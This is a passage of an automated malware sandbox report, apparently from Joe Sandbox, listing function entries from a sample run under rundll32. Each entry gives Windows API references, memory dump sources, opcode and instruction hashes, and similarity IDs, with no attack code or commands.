                                                                                                                • Opcode Fuzzy Hash: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                                                • Instruction Fuzzy Hash: 53F0A5B6210218ABCB18DF89DC85EAB77ADEF88754F118159BE0997241C630F911CBB5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • NtDeleteFile.NTDLL(02A67562,00000002,?,02A67562,00000000,00000018,?,?,6398FDE0,00000000,?), ref: 02A6C8F5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 4033686569-0
                                                                                                                • Opcode ID: 67dba125171d69ef394929055196f51f834783aca3ed7bd604501a9affb438d7
                                                                                                                • Instruction ID: 59b1448250757289837305618b72c21d91b36bf6db5b98618389fae4d11a84fe
                                                                                                                • Opcode Fuzzy Hash: 67dba125171d69ef394929055196f51f834783aca3ed7bd604501a9affb438d7
                                                                                                                • Instruction Fuzzy Hash: E9E0C2353401106BC720DF94CD88ED33B69EF88350F108845FA4C5B341C631E91587E0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • NtClose.NTDLL(02A5E565,00000000,?,02A5E565,?,?,?,?,?,?,?,00000000,?,00000000), ref: 02A6C925
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                • Opcode ID: 91ce04e1e7c7b3cd94ceb231c9e4254354cc0db552755e11232069f9945582ae
                                                                                                                • Instruction ID: af0b4f84c2d392a564127c2e0fea265ac73ffe46ae2b5ac7b146346a65143a92
                                                                                                                • Opcode Fuzzy Hash: 91ce04e1e7c7b3cd94ceb231c9e4254354cc0db552755e11232069f9945582ae
                                                                                                                • Instruction Fuzzy Hash: D6E0C272200104ABEB10DBF4CC48FD73F29DF88360F008456BA1C9B681C531E910CBE0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • NtDeleteFile.NTDLL(02A67562,00000002,?,02A67562,00000000,00000018,?,?,6398FDE0,00000000,?), ref: 02A6C8F5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 4033686569-0
                                                                                                                • Opcode ID: 9cdb9952ef2d184753929ab23e7c45e026e579668fdbcbf3541df72b633117aa
                                                                                                                • Instruction ID: e989f7df1eb8f804c4a8ab31fb266d215fea191c7b84ec1b2de37f4c0f1302d5
                                                                                                                • Opcode Fuzzy Hash: 9cdb9952ef2d184753929ab23e7c45e026e579668fdbcbf3541df72b633117aa
                                                                                                                • Instruction Fuzzy Hash: F8D017722402146BD614EB99DC89ED77BACDF88760F018455BA1D5B681CA30FA108BE1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • NtClose.NTDLL(02A5E565,00000000,?,02A5E565,?,?,?,?,?,?,?,00000000,?,00000000), ref: 02A6C925
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                • Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                                                • Instruction ID: b9fd70847319de5ee12b1c178ac3e94031bd7b2b8303b256cbcbb953fb8bec77
                                                                                                                • Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                                                • Instruction Fuzzy Hash: 87D01772240214ABD614EBA9DC89E977BADDF88660F018455BA1D5B682C630FA108AE1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 540cf401434b90c4e295328e8bf2da9caa1c36eb38c2a8f5e5b3b8d974b2f780
                                                                                                                • Instruction ID: 752b7033c0c79d3becc89ace00aa4f1a131bfe93f6559ee0253a609833314cca
                                                                                                                • Opcode Fuzzy Hash: 540cf401434b90c4e295328e8bf2da9caa1c36eb38c2a8f5e5b3b8d974b2f780
                                                                                                                • Instruction Fuzzy Hash: 079002A5611000032907A55907045070056DBD5395351C022F5006551DD765D8A16161
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 9be1ca737fce6a31c97b5129f20fe14c0a73ce95ef41668c5003d9b4650ec527
                                                                                                                • Instruction ID: 36b99e8c8b274c2e5393ec27cdddc5e05b01e7973ab8b4418df390a22ff1ab9f
                                                                                                                • Opcode Fuzzy Hash: 9be1ca737fce6a31c97b5129f20fe14c0a73ce95ef41668c5003d9b4650ec527
                                                                                                                • Instruction Fuzzy Hash: 289002A5621000032947A559060450B0455EBD6395391C016F5407591DC765D8A56361
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: f05d4ef39dc3d30fb41402edc3abc998e9dced9081c3ecf75950646b36440d9a
                                                                                                                • Instruction ID: e652a6f25c3925035679c7c38a10f33d0eb47721cac5dc827d72f4e281579774
                                                                                                                • Opcode Fuzzy Hash: f05d4ef39dc3d30fb41402edc3abc998e9dced9081c3ecf75950646b36440d9a
                                                                                                                • Instruction Fuzzy Hash: F39002E160200003690771594414616401ADBE0245B51C022E5005591EC669D8D17165
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 39af398b4229546f45d13ee9328b09528d776854758d57f42f07fd308a558043
                                                                                                                • Instruction ID: c5606c11f805a77719d2cf85eca50be2b0d3bcd35b0572bc4a893bb99bd41d86
                                                                                                                • Opcode Fuzzy Hash: 39af398b4229546f45d13ee9328b09528d776854758d57f42f07fd308a558043
                                                                                                                • Instruction Fuzzy Hash: 669002B160504843F94271594404A460025DBD0349F51C012A4055695E9769DD95B6A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 935256640bdb3d9489b1c15ecdeb31761b3b43d4265ba3a6fda54daba648adbb
                                                                                                                • Instruction ID: 99c0b4727ea1e1c3a440679aa30f6dc139426d3c7483dfd16c6f51b684fcf3df
                                                                                                                • Opcode Fuzzy Hash: 935256640bdb3d9489b1c15ecdeb31761b3b43d4265ba3a6fda54daba648adbb
                                                                                                                • Instruction Fuzzy Hash: D59002B160100803F9827159440464A0015DBD1345F91C016A4016655ECB59DA9977E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 9708347034fa5371a595d48347b947bf2cc04a471c0a759472d6431a142e3fcb
                                                                                                                • Instruction ID: 3794198bd65922fb3ba598ef3fc46c0837e695502b49353a5ea7dc1761a2d965
                                                                                                                • Opcode Fuzzy Hash: 9708347034fa5371a595d48347b947bf2cc04a471c0a759472d6431a142e3fcb
                                                                                                                • Instruction Fuzzy Hash: 8F9002B1A0500803F952715944147460015DBD0345F51C012A4015655E8799DA9576E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 4db97232c93d6efc1abccdeb77a20908bf835ddd6cc02d2bbb07c23d1dbfa7af
                                                                                                                • Instruction ID: fa3a073222fad5a22bb8e2059b03b168941694ad6ef96bcbbafce06492d46332
                                                                                                                • Opcode Fuzzy Hash: 4db97232c93d6efc1abccdeb77a20908bf835ddd6cc02d2bbb07c23d1dbfa7af
                                                                                                                • Instruction Fuzzy Hash: 179002B160100843F90261594404B460015DBE0345F51C017A4115655E8759D8917561
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: b71edc4c6f3621e9d02ed4a941598564fa7cdebdd01bc746a0d9e37ac27eed42
                                                                                                                • Instruction ID: 92f91ac7f35cbb97b14ba6111335af5ca43a3eace36d6ee40386c65f00817f8d
                                                                                                                • Opcode Fuzzy Hash: b71edc4c6f3621e9d02ed4a941598564fa7cdebdd01bc746a0d9e37ac27eed42
                                                                                                                • Instruction Fuzzy Hash: D79002B160108803F9126159840474A0015DBD0345F55C412A8415659E87D9D8D17161
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: f3f3e0873ff8b94ea523d73e670d62b84edaf57686f84a39477bfb36b9095c85
                                                                                                                • Instruction ID: 033620fea6c190caa3b5f41f4f2689325f393dbb230d8454504186f88b4a8462
                                                                                                                • Opcode Fuzzy Hash: f3f3e0873ff8b94ea523d73e670d62b84edaf57686f84a39477bfb36b9095c85
                                                                                                                • Instruction Fuzzy Hash: 6D9002B160100403F902659954086460015DBE0345F51D012A9015556FC7A9D8D17171
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode
                                                                                                                • String ID: T
                                                                                                                • API String ID: 2340568224-3187964512
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 02A5FE13
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID: @
                                                                                                                • API String ID: 3188754299-2766056989
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 02A652B7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID: @J7<
                                                                                                                • API String ID: 2538663250-2016760708
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,-00000002,C53CA26C,00000000,00000000,02A5DDD2,?,?,?,C53CA26C,?), ref: 02A6B6A2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2422867632-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02A5B1D2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Load
                                                                                                                • String ID:
                                                                                                                • API String ID: 2234796835-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,-00000002,C53CA26C,00000000,00000000,02A5DDD2,?,?,?,C53CA26C,?), ref: 02A6B6A2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2422867632-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(02A66EF6,?,02A6769D,02A6769D,?,02A66EF6,00000000,?,?,?,?,00000000,00000000,00000002), ref: 02A6CACD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,02A5E132,02A5E132,?,00000000,?,?), ref: 02A6CC70
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3899507212-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,6398FDE0,00000000,?), ref: 02A6CB0D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNEL32(0000B1E8,?,?,?,?,?), ref: 02A5E80A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00008003,?,?,02A58D9A,?), ref: 02A5E611
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode
                                                                                                                • String ID:
                                                                                                                • API String ID: 2340568224-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
